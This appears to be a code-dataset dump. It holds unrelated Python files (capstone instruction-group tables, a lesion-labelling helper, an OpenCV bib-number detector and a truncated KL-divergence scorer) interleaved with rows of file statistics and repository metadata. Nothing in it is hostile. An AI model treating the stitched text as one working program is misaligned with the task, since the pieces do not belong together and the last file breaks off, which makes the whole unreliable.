SSE2 "PAUSE", # SSE3 "MONITOR", "MWAIT", "XABORT", "XACQUIRE", "XRELEASE", "XBEGIN", "XEND", "XTEST", "HLT", "SYSCALL", "SYSENTER", "SYSEXIT", "SYSRET", "FWAIT", "WAIT", # vm related instructions "VMCALL", "VMLAUNCH", "VMMCALL", "VMRESUME", "VMRUN", "VMFUNC", "VMCLEAR", "VMXON", "VMXOFF", ] X86_GRP_COND_CTRANSFER = [ # general purpose instructions "JA", "JAE", "JB", "JBE", "JC", "JCXZ", "JE", "JECXZ", "JRCXZ", "JG", "JGE", "JL", "JLE", "JNAE", "JNB", "JNBE", "JNC", "JNE", "JNG", "JNGE", "JNL", "JNLE", "JNO", "JNP", "JNS", "JNZ", "JO", "JP", "JPE", "JPO", "JS", "JZ", "LOOP", "LOOPE", "LOOPNE", "LOOPNZ", "LOOPZ", # string "REP", "REP MOVSQ", "REP STOSQ", "REPNE", "REPNZ", "REPE", "REPZ", ] # ==================== ARM 32 ============================================= ARM_GRP_DTRANSFER = [ # general purpose instructions "LDA", "ADR", "ADRP", "LDR", "LDRD", "LDRB", "LDRBT", "LDRH", "LDRS", "LDRSB", "LDRSBT", "LDRSH", "LDRSHT", "LDRT", "LDRHT", "STR", "STRB", "STRD", "STRH", "STRBT", "STRT", "LDM", "LDMDA", "LDMDB", "LDMIB", "STM", "STMDA", "STMDB", "STMIB", "PLD", "SWP", "MOV", "MOVI", "MOVK", "MOVZ", "MOVT", "MOVN", "MVN", "MVNI", "STP", "LDP", "RFEIB", # coprocessor data operations "CDP", "MCR", "MCRR", "MRC", "MRR", "LDC", "LDCL", "STC", "STCL", "PUSH", "SBFX", "SBFIZ", "BFX", "BFXIL", "UBFX", "UBFIZ", "VLD", "VST", "VST2", "VSTMDB", "VTBL", "VTBX", "ZIP", "ZIP1", "ZIP2", "UZP", "UZP1", "UZP2", "XTN", "XTN2", "CSEL", "LD1", "LD2", "LD4", "ST1", "ST2", "ST4", "LDPSW", "LDRSW", "SXTAB", "SXTB", "SXTH", "SXTW", "EXT", "EXTR", "INS", "UXTAB", "UXTB", "UXTH", "UXTW", "BFC", "BFI", "BIC", "CLZ", "REV", "REV16", "REV32", "REV64", "CSET", ] ARM_GRP_FLOAT_DTRANSFER = [ # floating point data transfer instructions "FCPY", "FCVTMS", "FCVTMU", "FCVTZS", "FCVTZU", "FCVT", "FLD", "FST", "FMR", "FMD", "FMS", "FMX", "FSITO", "FUITO", "FTOSI", "FTOUI", "FMOV", "UMOV", "LDUR", "LDURB", "LDURH", "LDURSB", "LDURSH", "LDURSW", "STUR", "STURB", "STURH", "STURSB", "STURSH", "STURSW", "DUP", 
"SCVTF", "UCVTF", ] ARM_GRP_MISC = [ "UDF", "NOP", "MRS", "MSR", "MAR", "MRA", "VMRS", "VMSR", "DBG", "DMB", "DSB", "ISB", "SETEND", ] # binary arithmetic instructions: ARM_GRP_ARITH = [ # general purpose instructions "ADD", "ADDW", "ADDP", "ADDV", "ADC", "SUB", "SBC", "RSB", "RSC", "CMN", "CLZ", "MUL", "MLA", "MLS", "CINC", "CINV", "NEG", "NEGS", "DIV", "SMAX", "SMAXV", "SMIN", "SMINV", "UMULL", "UMLAL", "UMLAL2", "SMLA", "SMLAL", "SMLALTT", "SMUL", "SMSUB", "MADD", "MNEG", "MSUB", "SMADDL", "SMNEGL", "SMSUBL", "SMULH", "SMULL", "UMADDL", "UMNEGL", "UMSUBL", "UMULH", "UMULL", "SDIV", "UDIV", "MIA", "QADD", "QSUB", "QDADD", "QDSUB", "QASX", "SADD", "SADDW", "SADDW2", "SASX", "SHADD", "SHASX", "SMLSD", "SMMLA", "SMUAD", "SMUSD", "SSUB", "SAT", "SAX", "UADD", "UADDW", "UADDW2", "USAT", "USAX", "UASX", "UHADD", "UHASX", "UMLSD", "UMMLA", "UQADD", "UQSAX", "UQSUB", "UHSAX", "VABA", "VABD", "MAX", "MIN", "VMLA", "VMLS", "VNMUL", "VNMLA", "VNMLS", "VFMS", "VFMS", "VFMA", "VFMS", "VFNMA", "VFNMS", "VRECPE", "VSQRT", "VQRSH", "UMULL", "UMAAL", "UMLAL", "USADA8", "VNEG", "CNEG", "CSINC", "CSINV", "CSNEG", ] ARM_GRP_FLOAT_ARITH = [ # floating point arithmetic instructions "FABS", "FABD", "FADD", "FSUB", "FDIV", "FMUL", "FNMUL", "FSQRT", "FMAC", "FNMAC", "FMSC", "FNMSC", "FNEG", "FMADD", "FMSUB", "FNMADD", "FNMSUB", "FPINT", "FCSEL", "FMAX", "FMIN", "FMLA", "FMLS", "FRINTM", "FRINTP", "FRINT", ] ARM_GRP_SHIFT = [ # shift operations "ASR", "LSL", "LSR", "ROR", "RRX", "PKHBT", "PKHTB", "SHL", "USHL", "USHLL", "USHLL2", "USHR", "USRA", "SSHL", "SSHLL", "SSHLL2", "SSHR", ] ARM_GRP_CMP = [ # compare instructions "CMEQ", "CMGT", "CMHI", "CMHS", "CMP", "CCMN", "CCMP", "VCEQ", "VCGE", "VCGT", "VCLE", "VCLT", # from bit "TST", "TEQ", ] ARM_GRP_FLOAT_CMP = [ "VCMP", "VCMPE", "FCMPE", "FCMGT", "FCM", "FCMP", "FCCMP", "VCM", ] # Logical Instructions: ARM_GRP_LOGIC = [ "AND", "ORR", "EOR", "EON", "ORN", ] # bit and byte instructions: ARM_GRP_BIT = [ "TST", "TEQ", "BSL", "BIF", "BIT", 
"BFC", "BFI", "BIC", "CLZ", "RBIT", "REV", "REV16", "REV32", "REV64", "CSET", ] # control transfer instructions: ARM_GRP_CTRANSFER = [ "B", "BR", "BL", "BLR", "BX", "BLX", "BXJ", "BAL", "BLAL", "BXAL", "BLXAL", "BXJAL", "SWI", "BKPT", "RET", "YIELD", "WFE", "WFI", "SEV", "SEVL", "CPS", "BRK", "HLT", "SVC", "HVC", "SMC", "TRAP", "ERET", # ARM POP is return "POP", ] ARM_GRP_COND_CTRANSFER = [ "BEQ", "BNE", "BCS", "BCC", "BMI", "BPL", "BVS", "BVC", "BHI", "BLS", "BGE", "BLT", "BGT", "BLE", "BLEQ", "BLNE", "BLCS", "BLCC", "BLMI", "BLPL", "BLVS", "BLVC", "BLHI", "BLLS", "BLGE", "BLLT", "BLGT", "BLLE", "BXEQ", "BXNE", "BXCS", "BXCC", "BXMI", "BXPL", "BXVS", "BXVC", "BXHI", "BXLS", "BXGE", "BXLT", "BXGT", "BXLE", "BLXEQ", "BLXNE", "BLXCS", "BLXCC", "BLXMI", "BLXPL", "BLXVS", "BLXVC", "BLXHI", "BLXLS", "BLXGE", "BLXLT", "BLXGT", "BLXLE", "BXJEQ", "BXJNE", "BXJCS", "BXJCC", "BXJMI", "BXJPL", "BXJVS", "BXJVC", "BXJHI", "BXJLS", "BXJGE", "BXJLT", "BXJGT", "BXJLE", "TBZ", "TBNZ", # combined instructions "CBZ", "CBNZ", ] # ==================== MIPS 32 ============================================= # data transfer # refernce : https://www.cs.cornell.edu/courses/cs3410/2008fa/MIPS_Vol2.pdf MIPS_GRP_DTRANSFER = [ "LB", "LBU", "LH", "LHU", "LL", "LW", "LWU", "LD", "LDL", "LDR", "LWL", "LWR", "PREF", "SB", "SC", "SD", "SDL", "SDR", "SH", "ST", "SW", "SWL", "SWR", "SYNC", "LUI", "LDXC1", "LWXC1", "SDXC1", "SWXC1", "MFHI", "MFLO", "MOV", "MOVF", "MOVN", "MOVT", "MOVZ", "MTHI", "MTLO", "MOVE", "CVT", "LDC", "LWC", "SDC", "SWC", # move "CFC", "CTC", "MFC", "MTC", "PREF", "SYNC", "SPLAT", "CFCMSA", "CTCMSA", "COPY", "PUSH", "SEH", "SEB", "WSBH", "DSBH", "DSHD", "MTC0", "MFC0", "LDC3", "LWC3", "SDC3", "SWC3", # coprocessor load, store "COP2", "LDC2", "LWC2", "SDC2", "SWC2", # cop move "CFC2", "CTC2", "MFC2", "MTC2", ] MIPS_GRP_FLOAT_DTRANSFER = [ # floating point "FRINT", "FCLASS", # load, store, memory "LDC1", "LWC1", "SDC1", "SWC1", # move "CFC1", "CTC1", "MFC1", "FMOV", "MOVF", "MOVN", 
"MOVT", "MOVZ", "MTC1", # convert "FEX", "FFINT", "FFQ", "FTINT", "FTRUN", "FTQ", "FCVT", "FLOOR", "ROUND", "TRUNC", "FFLOOR", "FROUND", "FTRUNC", "DMFC", "DMFC1", "DMTC", "DMTC1", "MTHC1", "MFHC1", ] # binary arithmetic instructions: MIPS_GRP_ARITH = [ # general purpose instructions "ADD", "ADDI", "ADDU", "ADDIU", "SUB", "SUBU", "MUL", "MULT", "MULTU", "CLO", "CLZ", "DIV", "DIVU", "MADD", "MADDU", "MSUB", "MSUBU", "AADD", "ASUB", "ABS", "NEG", "NEGU", # additional "DAA", "DSUB", "DSUBU", "DSUBIU", "DDIV", "DDIVU", "DDIVIU", "DMUL", "DMULT", "DMULTU", "DOTP", "DPADD", "DPSUB", "MADD", "MAX", "MIN", "MSUB", "MOD", "SAT", "HSUB", "SQRT", "AUI", "DAUI", "DAHI", "DATI", "ADDIUPC", "AUIPC", "ALUIPC", "DADD", "DADDU", "DADDIU", "DCLZ", # from bit "BMZ", "BMN", "BNEG", ] MIPS_GRP_CMP = [ "SLT", "SLTI", "SLTIU", "SLTU", # compare instructions "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT", "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT", "CNGE", "CLE", "CNGT", "CMP", "CEQ", "CLE", "CLT", "CF", "CUN", "CEQ", "CUEQ", "COLT", "CULT", "COLE", "CULE", "CSF", "CNGLE", "CSEQ", "CNGL", "CLT", "CNGE", "CLE", "CNGT", "C", ] MIPS_GRP_FLOAT_CMP = [ # floating point compare instructions "FACF", "FC", "FS", ] MIPS_GRP_SHIFT = [ # shift operation "SLL", "SLLV", "SRL", "SRLV", "SRA", "SRAV", "SHL", "SHR", "SLD", "DSLL", "DSLL32", "DSLLV", "DSRA", "DSRA32", "DSRAV", "DSRL", "DSRL32", "DSRLV", "ROTR", "ROTRV", "DROTR", "DROTR32", "DROTRV", "LSA", "DLSA", ] MIPS_GRP_FLOAT_ARITH = [ # floating point "FABS", "FADD", "FDIV", "FMADD", "FMSUB", "FMUL", "FNEG", "FNMADD", "FNMSUB", "FEXP", "FLOG", "FMAX", "FMIN", "FRCP", "RECIP", "FRECIP", "FRSQRT", "FSQRT", "FSUB", ] # Logical Instructions: MIPS_GRP_LOGIC = [ "AND", "ANDI", "NOR", "OR", "NOT", "ORI", "XOR", "XORI", ] # bit and byte instructions: MIPS_GRP_BIT = [ "BINS", "DINS", "DEXT", "EXT", "INS", "BMZ", "BMN", "BNEG", "BSEL", "BSET", "BCLR", # bit wise count "NLOC", "NLZC", "PCNT", ] MIPS_GRP_MISC = [ "NOP", 
"SSNOP", "CACHE", "TLBP", "TLBR", "TLBWI", "TLBWR", ] # control transfer instructions: MIPS_GRP_CTRANSFER = [ "B", "BAL", "J", "JAL", "JR", "JALR", "BREAK", "SYSCALL", "PAUSE", "WAIT", "HLT", "ERET", "DERET", "SDBBP", "BKPT", "RET", "MFC0", "MTC0", # MIPS POP is return "POP", # float "BC1", "BC1F", "BC1T", "BC1FL", "BC1TL", # cop "BC2F", "BC2T", "BC2FL", "BC2TL", "BC3F", "BC3T", "BC3FL", "BC3TL", ] MIPS_GRP_COND_CTRANSFER = [ "BEQ", "BEQZ", "BNE", "BGE", "BGEZ", "BGEZAL", "BGTZ", "BLEZ", "BLTZ", "BLTZAL", "BNEL", "BNEZ", "BNZ", "TEQ", "TEQI", "TGE", "TGEI", "TGEIU", "TGEU", "TLT", "TLTI", "TLTIU", "TLTU", "TNE", "TNEI", "BEQL", "BGEZALL", "BGEZL", "BGTZL", "BLEZL", "BLTZALL", "BLTZL", "BNEL", ] # ============================================ # Below part creates dictionary which groups instructions X86_GRP_MAP = { 9: X86_GRP_FLOAT_DTRANSFER + X86_GRP_FLOAT_CMP + X86_GRP_FLOAT_ARITH, 10: X86_GRP_MISC + X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER, 11: X86_GRP_FLOAT_ARITH + X86_GRP_SHIFT + X86_GRP_ARITH, 12: X86_GRP_LOGIC, 13: X86_GRP_COND_CTRANSFER + X86_GRP_CTRANSFER, 20: X86_GRP_FLOAT_DTRANSFER + X86_GRP_DTRANSFER, 21: X86_GRP_FLOAT_ARITH + X86_GRP_ARITH, 22: X86_GRP_FLOAT_CMP + X86_GRP_CMP, 23: X86_GRP_SHIFT, 24: X86_GRP_BIT, 26: X86_GRP_COND_CTRANSFER, 27: X86_GRP_CTRANSFER, 28: X86_GRP_MISC, 30: [], } ARM_GRP_MAP = { 9: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_FLOAT_CMP + ARM_GRP_FLOAT_ARITH, 10: ARM_GRP_MISC + ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER, 11: ARM_GRP_FLOAT_ARITH + ARM_GRP_SHIFT + ARM_GRP_ARITH, 12: ARM_GRP_LOGIC, 13: ARM_GRP_COND_CTRANSFER + ARM_GRP_CTRANSFER, 20: ARM_GRP_FLOAT_DTRANSFER + ARM_GRP_DTRANSFER, 21: ARM_GRP_FLOAT_ARITH + ARM_GRP_ARITH, 22: ARM_GRP_FLOAT_CMP + ARM_GRP_CMP, 23: ARM_GRP_SHIFT, 24: ARM_GRP_BIT, 26: ARM_GRP_COND_CTRANSFER, 27: ARM_GRP_CTRANSFER, 28: ARM_GRP_MISC, 30: [], } # A64 does not allow instructions to be conditionally executed as ARM. 
def _copy_for_arm64():
    """Return a deep copy of ARM_GRP_MAP for AArch64.

    A64 does not allow instructions to be conditionally executed as ARM
    (A32) does, so the ARM64 table starts from an independent copy that can
    diverge without mutating the shared ARM lists.
    """
    import copy
    return copy.deepcopy(ARM_GRP_MAP)


ARM64_GRP_MAP = _copy_for_arm64()

# ARM instructions may have conditional suffix. Thus, initialize here. However,
# reference : http://infocenter.arm.com/help/index.jsp
ARM_COND_GROUPS = [9, 10, 11, 13, 20, 21, 22, 26]
# Two-letter A32 condition codes that may be appended to a base mnemonic.
ARM_GRP_COND_CODE = [
    "EQ", "NE", "CS", "HS", "CC", "LO", "MI", "PL", "VS", "VC", "HI", "LS",
    "GE", "LT", "GT", "LE", "AL",
]
# for group_no in ARM_COND_GROUPS:
#     for inst in ARM_GRP_MAP[group_no]:
#         for cond in ARM_GRP_COND_CODE:
#             ARM_GRP_MAP[group_no].append(inst + cond)

MIPS_GRP_MAP = {
    9: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_FLOAT_CMP + MIPS_GRP_FLOAT_ARITH,
    10: MIPS_GRP_MISC + MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
    11: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_SHIFT + MIPS_GRP_ARITH,
    12: MIPS_GRP_LOGIC,
    13: MIPS_GRP_COND_CTRANSFER + MIPS_GRP_CTRANSFER,
    20: MIPS_GRP_FLOAT_DTRANSFER + MIPS_GRP_DTRANSFER,
    21: MIPS_GRP_FLOAT_ARITH + MIPS_GRP_ARITH,
    # mips usually contains compare in conditional branch
    22: MIPS_GRP_FLOAT_CMP + MIPS_GRP_CMP + MIPS_GRP_COND_CTRANSFER,
    23: MIPS_GRP_SHIFT,
    24: MIPS_GRP_BIT,
    26: MIPS_GRP_COND_CTRANSFER,
    27: MIPS_GRP_CTRANSFER,
    28: MIPS_GRP_MISC,
    30: [],
}

# ============================================
GRP_NO_MAP = {
    # Among capstone's default mapping, use 1, 2, 3 as they are common in all
    # architectures.
    1: "grp_jump",
    2: "grp_call",
    3: "grp_ret",
    9: "floatinst",
    10: "abs_dtransfer",
    11: "abs_arith",
    12: "logic",
    13: "abs_ctransfer",
    20: "dtransfer",
    21: "arith",
    22: "cmp",
    23: "shift",
    24: "bitflag",
    26: "cndctransfer",
    27: "ctransfer",
    28: "misc",
    30: "unknown",
}
# Reverse lookup: group name -> group number.
GRP_NAME_MAP = {val: key for key, val in GRP_NO_MAP.items()}

# ============================================
# Below part maps capstone's internal instruction numbers to pre-defined groups


def _check_inst(target_inst, check_list, suffixes=()):
    """Return True if `target_inst` matches a mnemonic in `check_list`.

    The mnemonic is normalized first (capstone decorations after "_" or "."
    are dropped, then upper-cased).  A match is either exact or
    `base + cond`, where `cond` is one of the two-letter conditional codes
    in `suffixes` (empty for non-ARM architectures).

    Note: the default is an immutable tuple; a mutable `[]` default would
    be shared across calls.
    """
    target_inst = target_inst.split("_")[0]
    target_inst = target_inst.split(".")[0]
    target_inst = target_inst.upper()
    for inst in check_list:
        if target_inst == inst:
            return True
        # Check conditional code: all condition codes are exactly 2 letters.
        if target_inst.startswith(inst) and len(target_inst) - len(inst) == 2:
            if target_inst[len(inst):] in suffixes:
                return True
    return False


def _init_inst_groups(prefix, target, groups):
    """Map capstone instruction IDs to the group numbers defined above.

    `target` is a capstone architecture module (e.g. `capstone.x86`) whose
    `<prefix>*` attributes enumerate the instruction constants; `groups`
    maps a group number to its mnemonic list.  Instructions matching no
    group are tagged "unknown".  Returns {inst_no: [group_no, ...]}.
    """
    insts = [name for name in dir(target) if name.startswith(prefix)]
    # Only A32 ARM mnemonics may carry conditional suffixes.
    suffixes = ARM_GRP_COND_CODE if prefix == "ARM_INS_" else []
    inst_map = {}
    for name in insts:
        inst_no = getattr(target, name)
        # Strip only the leading prefix (str.replace would also rewrite any
        # later occurrence of the prefix inside the name).
        mnemonic = name[len(prefix):]
        inst_map[inst_no] = [
            group_no
            for group_no, grouped_insts in groups.items()
            if _check_inst(mnemonic, grouped_insts, suffixes)
        ]
        if not inst_map[inst_no]:
            inst_map[inst_no].append(GRP_NAME_MAP["unknown"])
    return inst_map


def _init_groups():
    """Build the per-architecture {inst_no: [group_no, ...]} tables."""
    import capstone
    x86 = _init_inst_groups("X86_INS_", capstone.x86, X86_GRP_MAP)
    arm = _init_inst_groups("ARM_INS_", capstone.arm, ARM_GRP_MAP)
    arm64 = _init_inst_groups("ARM64_INS_", capstone.arm64, ARM64_GRP_MAP)
    mips = _init_inst_groups("MIPS_INS_", capstone.mips, MIPS_GRP_MAP)
    ppc = _init_inst_groups("PPC_INS_", capstone.ppc, PPC_GRP_MAP)
    return x86, arm, arm64, mips, ppc


X86_INST_MAP, ARM_INST_MAP, ARM64_INST_MAP, MIPS_INST_MAP, PPC_INST_MAP = _init_groups()
14.753525
88
0.455952
2,666
28,253
4.683421
0.587772
0.020663
0.016338
0.006407
0.106279
0.077607
0.045971
0.016979
0.016979
0.016979
0
0.024486
0.343751
28,253
1,914
89
14.761233
0.64894
0.108201
0
0.174723
0
0
0.297529
0
0
0
0
0
0
1
0.00233
false
0
0.001747
0
0.007571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd65fd304b42fd5e57669cf829df3d843fd24ed
814
py
Python
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
9
2018-02-02T07:26:06.000Z
2021-07-28T11:27:38.000Z
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
null
null
null
dwi/patient.py
jupito/dwilib
6655eea21037977ed528b992b3a8471393127b77
[ "MIT" ]
4
2017-02-22T03:23:44.000Z
2021-12-10T10:32:08.000Z
"""Routines for handling patient lists.""" # TODO: Some functions from dwi.compat should be replaced with something better # here, they're still used by tools/{roc_auc,correlation}.py. from .types import GleasonScore def label_lesions(patients, thresholds=None): """Label lesions according to score groups.""" # Alternative: np.searchsorted(thresholds, [x.score for x in l]) if thresholds is None: thresholds = GleasonScore.THRESHOLDS_STANDARD thresholds = [GleasonScore(x) for x in thresholds] lesions = (l for p in patients for l in p.lesions) for l in lesions: l.label = sum(l.score > x for x in thresholds) def keep_scan(patients, i): """Discard other scans except index i. NOTE: Changes the structure.""" for p in patients: p.scans = [p.scans[i]]
33.916667
79
0.697789
118
814
4.779661
0.542373
0.021277
0.031915
0.024823
0.060284
0
0
0
0
0
0
0
0.202703
814
23
80
35.391304
0.869029
0.422604
0
0
0
0
0
0
0
0
0
0.043478
0
1
0.181818
false
0
0.090909
0
0.272727
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
bdd6f392de5f9a7829a76f27096203708e20bfc0
79
py
Python
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
1
2017-10-24T08:19:15.000Z
2017-10-24T08:19:15.000Z
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
31
2017-10-31T11:09:44.000Z
2018-12-04T07:47:46.000Z
2017/12.12/python/lsh-get-github-user.py
mksweetlife/study
0786a4bd7901ac0d1aa5efdae5b755693eee5cd3
[ "MIT" ]
5
2017-10-26T02:13:08.000Z
2018-07-05T04:58:47.000Z
def getUser():
    """Return the author's name and blog URL as a single string."""
    # FIXME: hard-coded placeholder; replace with a real lookup.
    return "Sanghak,Lee / http://sanghaklee.tistory.com"
39.5
64
0.696203
10
79
5.5
1
0
0
0
0
0
0
0
0
0
0
0
0.126582
79
2
64
39.5
0.797101
0.075949
0
0
0
0
0.589041
0
0
0
0
0.5
0
1
0.5
true
0
0
0.5
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
1
0
0
1
1
0
0
7
bdd8443fccc1ae0affec98253387eaf4b0c3a80b
5,039
py
Python
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
runNum.py
NuPatchara/gitCV
68d1ecf3150cc819051a3bb718fae160da0ddcf9
[ "Apache-2.0" ]
null
null
null
# Scan ./image/ for photographs, detect faces with a Haar cascade, then try to
# locate the race-bib number region below each face by finding contours and
# grouping those whose dominant colors and geometry agree.
# NOTE(review): uses cv2.cv.* constants and relies on integer division, so this
# appears to target OpenCV 2.x on Python 2 — confirm before running on 3.x.
import sys
import cv2
import os, os.path
import ColorClustering
import numpy as np
from PIL import Image
from pytesser import *
from sklearn.cluster import KMeans
from sklearn.externals import joblib


def find_most_Color(im, clusters):
    # Cluster the pixels of `im` (BGR image) into `clusters` dominant colors
    # and return the color bar produced by ColorClustering.
    imBodyRGB = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
    imBodyRGB = imBodyRGB.reshape((imBodyRGB.shape[0] * imBodyRGB.shape[1], 3))
    clt = KMeans(n_clusters=clusters)
    clt.fit(imBodyRGB)
    hist = ColorClustering.centroid_histogram(clt)
    bar = ColorClustering.plot_colors(hist, clt.cluster_centers_)
    return bar


for root, _, files in os.walk('image/'):
    for f in files:
        imagePath = os.path.join(root, f)
        if 'tmp' in imagePath:
            continue
        cascPath = 'haarcascade_frontalface_default.xml'
        faceCascade = cv2.CascadeClassifier(cascPath)
        image = cv2.imread(imagePath)
        imHeight, imWidth, channels = image.shape
        cv2.putText(image, '%ix%i' %(imWidth,imHeight), (50, 50),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        faces = faceCascade.detectMultiScale(
            gray,
            scaleFactor=1.1,
            minNeighbors=5,
            minSize=(30, 30),
            flags=cv2.cv.CV_HAAR_SCALE_IMAGE
        )
        for facesCount, (fx, fy, fw, fh) in enumerate(faces):
            # Reject detections whose size is implausible for this image.
            faceCom = imWidth/10 if imWidth>imHeight else imHeight/10
            if faceCom - fh > 50 or faceCom - fh < -30:
                continue
            cv2.rectangle(image, (fx, fy), (fx + fh, fy + fh), (0, 255, 0), 2)
            cv2.putText(image, 'face: %i' %(facesCount), (fx, fy + fh),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            cv2.putText(image, 'size: %i:%i' %(fw,fh), (fx, fy + fh -30),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            cv2.putText(image, 's.comp: %i ' %(faceCom), (fx, fy + fh -60),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
            # Torso region: roughly 2..5 face-heights below the face.
            bodyY = fy+(fh*2)  # NOTE(review): assigned but never used below
            bodyX1 = fx - fw / 3
            bodyX1 = 0 if bodyX1 < 0 else bodyX1
            imBody = image[fy + (fh*2):fy + (fh * 5), bodyX1:fx + fw + (fw / 3)]
            cv2.rectangle(image, (bodyX1, fy + (fh*2)), (fx + fw + (fw / 3), fy + (fh * 5)), (0, 255, 255), 2)
            gray = cv2.cvtColor(imBody, cv2.COLOR_BGR2GRAY)
            blur = cv2.GaussianBlur(gray, (9, 9), 0)
            thresh = cv2.adaptiveThreshold(blur, 255, 1, 1, 11, 2)
            contours, hierarchy = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
            dicBody = {}
            dicTmp = {}
            dicBest = {}
            # Keep digit-sized contours and record their dominant colors.
            for cntCount, cnt in enumerate(contours):
                [cx,cy,cw,ch] = cv2.boundingRect(cnt)
                if cv2.contourArea(cnt) > 28 and (fh / 5) < ch < (fh / 2) and cw < (fw / 2) :
                    cv2.rectangle(imBody, (cx, cy), (cx + cw, cy + ch), (0, 0, 255), 2)
                    poin = np.array([cx,cy,cw,ch])
                    numBar = find_most_Color(imBody[cy:cy + ch, cx:cx + cw], 2)
                    dicBody[cntCount] = (poin,numBar[0][0],numBar[0][len(numBar[0]) - 1])
            # Group contours that are aligned and similarly colored; keep the
            # largest group (presumably the bib digits).
            for cont in dicBody:
                x = dicBody[cont][0][0]
                y = dicBody[cont][0][1]
                h = dicBody[cont][0][3]
                c1 = dicBody[cont][1]
                c2 = dicBody[cont][2]
                clc1 = c1 if c1[0] > c2[0] else c2
                for c2Count, cont2 in enumerate(dicBody):
                    xl = dicBody[cont2][0][0]
                    yl = dicBody[cont2][0][1]
                    hl = dicBody[cont2][0][3]
                    cl1 = dicBody[cont2][1]
                    cl2 = dicBody[cont2][2]
                    clc2 = cl1 if cl1[0] > cl2[0] else cl2
                    clcl = int(clc1[0]) - int(clc2[0])
                    if yl - 10 < y < yl + 10 and xl - 200 < x < xl + 200 and hl - 5 < h < hl + 5 and abs(clcl) < 10:
                        dicTmp[c2Count] = dicBody[cont2]
                if len(dicTmp) > len(dicBest) and len(dicTmp) > 1:
                    dicBest = dicTmp
                dicTmp = {}
            # Bounding box of the best group of contours.
            minX = 999999
            maxX = 0
            minY = 999999
            maxY = 0
            for rec in dicBest:
                [rx, ry, rw, rh] = dicBest[rec][0]
                if minX > rx: minX = rx
                if minY > ry: minY = ry
                if maxY < ry+rh: maxY = ry+rh
                if maxX < rx+rw: maxX = rx+rw
            if minX <999999 and maxX >0:
                imgNum = imBody[minY:maxY, minX:maxX]
                cv2.rectangle(imBody, (minX+2, minY+2), (maxX+2, maxY+2), (255, 0, 255), 2)
            # cv2.imshow(str(facesCount),imBody)
            # cv2.imshow('num'+str(facesCount),imgNum)
        # Show the annotated image; 'w' advances to the next file, 'q' quits.
        cv2.namedWindow("main", cv2.cv.CV_WINDOW_NORMAL)
        imageWinSize = cv2.resize(image, (imWidth/2, imHeight/2))
        while True:
            cv2.imshow("main", imageWinSize)
            key = cv2.waitKey(1) & 0xFF
            if key == ord("w"):
                break
            elif key == ord("q"):
                cv2.destroyAllWindows()
                sys.exit()
41.991667
118
0.519944
656
5,039
3.946646
0.286585
0.013905
0.011587
0.011587
0.066435
0.053302
0.053302
0.053302
0.053302
0.032445
0
0.076133
0.343124
5,039
120
119
41.991667
0.706042
0.014884
0
0.018692
0
0
0.017936
0.007054
0
0
0.000806
0
0
0
null
null
0
0.084112
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bdd85f75dbf5d4102a25ebc2445a8a860dd88729
4,920
py
Python
networkunit/scores/score_kl_divergence.py
morales-gregorio/NetworkUnit
b858c3b2698fe3c0a7324ae8b8b388b74fd13c4d
[ "BSD-3-Clause" ]
8
2017-11-16T08:45:48.000Z
2021-11-29T16:51:45.000Z
networkunit/scores/score_kl_divergence.py
morales-gregorio/NetworkUnit
b858c3b2698fe3c0a7324ae8b8b388b74fd13c4d
[ "BSD-3-Clause" ]
17
2017-11-16T07:53:26.000Z
2021-05-07T10:27:34.000Z
networkunit/scores/score_kl_divergence.py
russelljjarvis/NetworkUnit
32179371d3a0ba354e6637cf4f97ba70522d4054
[ "BSD-3-Clause" ]
5
2019-03-23T00:55:33.000Z
2020-01-24T10:12:11.000Z
import numpy as np
from scipy.stats import entropy
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import seaborn as sns
import sciunit


def _finite_histograms(data_sample_1, data_sample_2, kl_binsize):
    """Histogram both samples on shared bin edges after dropping non-finite values.

    Returns (P, Q, edges, sample1, sample2) where P and Q are density
    histograms of the cleaned samples over identical edges.  Shared by
    compute() and plot(), which previously duplicated this code.
    """
    # filtering out nans (and +/-inf)
    sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)]
    sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)]
    max_value = max([max(sample1), max(sample2)])
